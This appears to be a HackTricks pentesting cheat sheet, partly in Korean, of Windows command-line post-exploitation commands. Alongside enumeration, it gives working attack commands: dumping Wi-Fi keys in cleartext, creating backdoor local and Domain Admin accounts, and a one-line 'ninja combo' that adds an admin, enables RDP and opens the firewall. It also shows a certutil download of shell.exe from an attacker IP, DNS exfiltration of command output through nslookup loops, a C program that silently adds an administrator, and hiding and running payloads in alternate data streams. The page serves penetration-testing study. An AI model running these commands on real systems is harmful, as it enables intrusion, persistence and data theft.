# Basic Win CMD for Pentesters {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ## ์‹œ์Šคํ…œ ์ •๋ณด ### ๋ฒ„์ „ ๋ฐ ํŒจ์น˜ ์ •๋ณด ```bash wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information wmic computersystem LIST full #Get PC info wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches wmic qfe list brief #Updates hostname DRIVERQUERY #3rd party driver vulnerable? ``` ### ํ™˜๊ฒฝ ```bash set #List all environment variables ``` Some env variables to highlight: * **COMPUTERNAME**: ์ปดํ“จํ„ฐ ์ด๋ฆ„ * **TEMP/TMP:** ์ž„์‹œ ํด๋” * **USERNAME:** ์‚ฌ์šฉ์ž ์ด๋ฆ„ * **HOMEPATH/USERPROFILE:** ํ™ˆ ๋””๋ ‰ํ† ๋ฆฌ * **windir:** C:\Windows * **OS**:Windows OS * **LOGONSERVER**: ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ ์ด๋ฆ„ * **USERDNSDOMAIN**: DNS์™€ ํ•จ๊ป˜ ์‚ฌ์šฉํ•  ๋„๋ฉ”์ธ ์ด๋ฆ„ * **USERDOMAIN**: ๋„๋ฉ”์ธ ์ด๋ฆ„ ```bash nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC ``` ### ๋งˆ์šดํŠธ๋œ ๋””์Šคํฌ ```bash (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) wmic logicaldisk get caption,description,providername ``` ### [๋””ํŽœ๋”](authentication-credentials-uac-and-efs/#defender) ### ํœด์ง€ํ†ต ```bash dir C:\$Recycle.Bin /s /b ``` ### ํ”„๋กœ์„ธ์Šค, ์„œ๋น„์Šค ๋ฐ ์†Œํ”„ํŠธ์›จ์–ด ```bash schtasks /query /fo LIST /v #Verbose out of scheduled tasks schtasks /query /fo LIST 2>nul | findstr TaskName schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM tasklist /V #List processes tasklist /SVC #links processes to started services net start #Windows Services started wmic service list brief #List services sc query #List of services dir /a "C:\Program Files" #Installed software dir /a "C:\Program Files (x86)" #Installed software reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software ``` ## ๋„๋ฉ”์ธ ์ •๋ณด ```bash # Generic AD info echo %USERDOMAIN% #Get domain name echo %USERDNSDOMAIN% #Get domain name echo %logonserver% #Get name of the domain controller set logonserver #Get name of the domain controller set log #Get name of the domain controller gpresult /V # Get current policy applied wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers # Users dsquery user #Get all users net user /domain #List all users of the domain net user /domain #Get information about that user net accounts /domain #Password and lockout policy wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users wmic sysaccount list /format:list #ย Dumps information about any system accounts that are being used as service accounts. # Groups net group /domain #List of domain groups net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here) net group "Domain Admins" /domain #List users with domain admin privileges net group "domain computers" /domain #List of PCs connected to the domain net group "Domain Controllers" /domain #List PC accounts of domains controllers wmic group list /format:list # Information about all local groups wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group # Computers dsquery computer #Get all computers net view /domain #Lis of PCs of the domain nltest /dclist: #List domain controllers wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers # Trust relations nltest /domain_trusts #Mapping of the trust relationships # Get all objects inside an OU dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL" ``` ### ๋กœ๊ทธ ๋ฐ ์ด๋ฒคํŠธ ```bash #Make a security query using another credentials wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321 ``` ## ์‚ฌ์šฉ์ž ๋ฐ ๊ทธ๋ฃน ### ์‚ฌ์šฉ์ž ```bash #Me whoami /all #All info about me, take a look at the enabled tokens whoami /priv #Show only privileges # Local users net users #All users dir /b /ad "C:\Users" net user %username% #Info about a user (me) net accounts #Information about password requirements wmic USERACCOUNT Get Domain,Name,Sid net user /add [username] [password] #Create user # Other users looged qwinsta #Anyone else logged in? #Lauch new cmd.exe with new creds (to impersonate in network) runas /netonly /user\ "cmd.exe" ::The password will be prompted #Check current logon session as administrator using logonsessions from sysinternals logonsessions.exe logonsessions64.exe ``` ### ๊ทธ๋ฃน ```bash #Local net localgroup #All available groups net localgroup Administrators #Info about a group (admins) net localgroup administrators [username] /add #Add user to administrators #Domain net group /domain #Info about domain groups net group /domain #Users that belongs to the group ``` ### ์„ธ์…˜ ๋ชฉ๋ก ``` qwinsta klist sessions ``` ### ๋น„๋ฐ€๋ฒˆํ˜ธ ์ •์ฑ… ``` net accounts ``` ### ์ž๊ฒฉ ์ฆ๋ช… ```bash cmdkey /list #List credential vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access ``` ### ์‚ฌ์šฉ์ž์™€์˜ ์ง€์†์„ฑ ```bash # Add domain user and put them in Domain Admins group net user username password /ADD /DOMAIN net group "Domain Admins" username /ADD /DOMAIN # Add local user and put them local Administrators group net user username password /ADD net localgroup Administrators username /ADD # Add user to insteresting groups: net localgroup "Remote Desktop Users" UserLoginName /add net localgroup "Debugger users" UserLoginName /add net localgroup "Power users" UserLoginName /add ``` ## ๋„คํŠธ์›Œํฌ ### ์ธํ„ฐํŽ˜์ด์Šค, ๋ผ์šฐํŠธ, ํฌํŠธ, ํ˜ธ์ŠคํŠธ ๋ฐ DNS ์บ์‹œ ```bash ipconfig /all #Info about interfaces route print #Print available routes arp -a #Know hosts netstat -ano #Opened ports? type C:\WINDOWS\System32\drivers\etc\hosts ipconfig /displaydns | findstr "Record" | findstr "Name Host" ``` ### ๋ฐฉํ™”๋ฒฝ ```bash netsh firewall show state # FW info, open ports netsh advfirewall firewall show rule name=all netsh firewall show config # FW info Netsh Advfirewall show allprofiles NetSh Advfirewall set allprofiles state off #Turn Off NetSh Advfirewall set allprofiles state on #Trun On netsh firewall set opmode disable #Turn Off #How to open ports netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138 netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139 netsh firewall add portopening TCP 3389 "Remote Desktop" #Enable Remote Desktop reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh firewall add portopening TCP 3389 "Remote Desktop" ::netsh firewall set service remotedesktop enable #I found that this line is not needed ::sc config TermService start= auto #I found that this line is not needed ::net start Termservice #I found that this line is not needed #Enable Remote Desktop with wmic wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1" ##or wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" #Enable Remote assistance: reg add โ€œHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Serverโ€ /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh firewall set service remoteadmin enable #Ninja combo (New Admin User, RDP + Rassistance + Firewall allow) net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable ::Connect to RDP (using hash or password) xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49 xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49 ``` ### ๊ณต์œ  ```bash net view #Get a list of computers net view /all /domain [domainname] #Shares on the domains net view \\computer /ALL #List shares of a computer net use x: \\computer\share #Mount the share locally net share #Check current shares ``` ### Wifi ```bash netsh wlan show profile #AP SSID netsh wlan show profile key=clear #Get Cleartext Pass ``` ### SNMP ``` reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s ``` ### ๋„คํŠธ์›Œํฌ ์ธํ„ฐํŽ˜์ด์Šค ```bash ipconfig /all ``` ### ARP ํ…Œ์ด๋ธ” ```bash arp -A ``` ## ๋‹ค์šด๋กœ๋“œ Bitsadmin.exe ``` bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 ``` CertReq.exe ``` CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt ``` Certutil.exe ``` certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe ``` **`Download`๋ฅผ ๊ฒ€์ƒ‰ํ•˜์—ฌ ๋” ๋งŽ์€ ์ •๋ณด๋ฅผ ์ฐพ์œผ์„ธ์š”** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/) ## ๊ธฐํƒ€ ```bash cd #Get current dir cd C:\path\to\dir #Change dir dir #List current dir dir /a:h C:\path\to\dir #List hidden files dir /s /b #Recursive list without shit time #Get current time date #Get current date shutdown /r /t 0 #Shutdown now type #Cat file #Runas runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials runas /netonly /user:\ "cmd.exe" ::The password will be prompted #Hide attrib +h file #Set Hidden attrib -h file #Quit Hidden #Give full control over a file that you owns icacls /t /e /p :F icacls /e /r #Remove the permision #Recursive copy to smb xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win #exe2bat to transform exe file in bat file #ADS dir /r #Detect ADS more file.txt:ads.txt #read ADS powershell (Get-Content file.txt -Stream ads.txt) # Get error messages from code net helpmsg 32 #32 is the code in that case ``` ### ๋ฌธ์ž ๋ธ”๋ž™๋ฆฌ์ŠคํŠธ ์šฐํšŒ ```bash echo %HOMEPATH:~6,-11% #\ who^ami #whoami ``` ### DOSfuscation CMD ๋ผ์ธ์„ ๋‚œ๋…ํ™”ํ•ฉ๋‹ˆ๋‹ค. ```powershell git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git cd Invoke-DOSfuscation Import-Module .\Invoke-DOSfuscation.psd1 Invoke-DOSfuscation help SET COMMAND type C:\Users\Administrator\Desktop\flag.txt encoding ``` ### Listen address ACLs ๊ด€๋ฆฌ์ž ๊ถŒํ•œ ์—†์ด [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/)์—์„œ ์ˆ˜์‹ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ```bash netsh http show urlacl ``` ### ์ˆ˜๋™ DNS ์…ธ **๊ณต๊ฒฉ์ž** (Kali)๋Š” ๋‹ค์Œ ๋‘ ๊ฐ€์ง€ ์˜ต์…˜ ์ค‘ ํ•˜๋‚˜๋ฅผ ์‚ฌ์šฉํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค: ```bash sudo responder -I #Active sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passive ``` #### ํ”ผํ•ด์ž **`for /f tokens`** ๊ธฐ๋ฒ•: ์ด๋ฅผ ํ†ตํ•ด ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๊ณ  ๊ฐ ์ค„์˜ ์ฒซ ๋ฒˆ์งธ X ๋‹จ์–ด๋ฅผ ๊ฐ€์ ธ์™€ DNS๋ฅผ ํ†ตํ•ด ์„œ๋ฒ„๋กœ ์ „์†กํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ```bash for /f %a in ('whoami') do nslookup %a #Get whoami for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a #Get word2 for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c #List folder for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c #List that folder for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c #Same as last one #More complex commands for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i #Same as last one ``` ์ถœ๋ ฅ์„ **๋ฆฌ๋‹ค์ด๋ ‰ํŠธ**ํ•˜๊ณ , ๊ทธ ํ›„์— **์ฝ์„** ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค. ``` whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i ``` ## C ์ฝ”๋“œ์—์„œ CMD ํ˜ธ์ถœํ•˜๊ธฐ ```c #include /* system, NULL, EXIT_FAILURE */ // When executed by Administrator this program will create a user and then add him to the administrators group // i686-w64-mingw32-gcc addmin.c -o addmin.exe // upx -9 addmin.exe int main (){ int i; i=system("net users otherAcc 0TherAcc! /add"); i=system("net localgroup administrators otherAcc /add"); return 0; } ``` ## Alternate Data Streams CheatSheet (ADS/Alternate Data Stream) **์˜ˆ์ œ๋Š”** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**์—์„œ ๊ฐ€์ ธ์™”์Šต๋‹ˆ๋‹ค! ๋” ๋งŽ์€ ๋‚ด์šฉ์ด ์žˆ์Šต๋‹ˆ๋‹ค!** ```bash ## Selected Examples of ADS Operations ## ### Adding Content to ADS ### # Append executable to a log file as an ADS type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" # Download a script directly into an ADS certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt ### Discovering ADS Content ### # List files and their ADS dir /R # Use Sysinternals tool to list ADS of a file streams.exe ### Extracting Content from ADS ### # Extract an executable stored in an ADS expand c:\ads\file.txt:test.exe c:\temp\evil.exe ### Executing ADS Content ### # Execute an executable stored in an ADS using WMIC wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"' # Execute a script stored in an ADS using PowerShell powershell -ep bypass - < c:\temp:ttt ``` {% hint style="success" %} AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks ์ง€์›ํ•˜๊ธฐ * [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! * **๐Ÿ’ฌ [**๋””์Šค์ฝ”๋“œ ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **ํŠธ์œ„ํ„ฐ** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** * **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŠธ๋ฆญ์„ ๊ณต์œ ํ•˜์„ธ์š”.**
{% endhint %}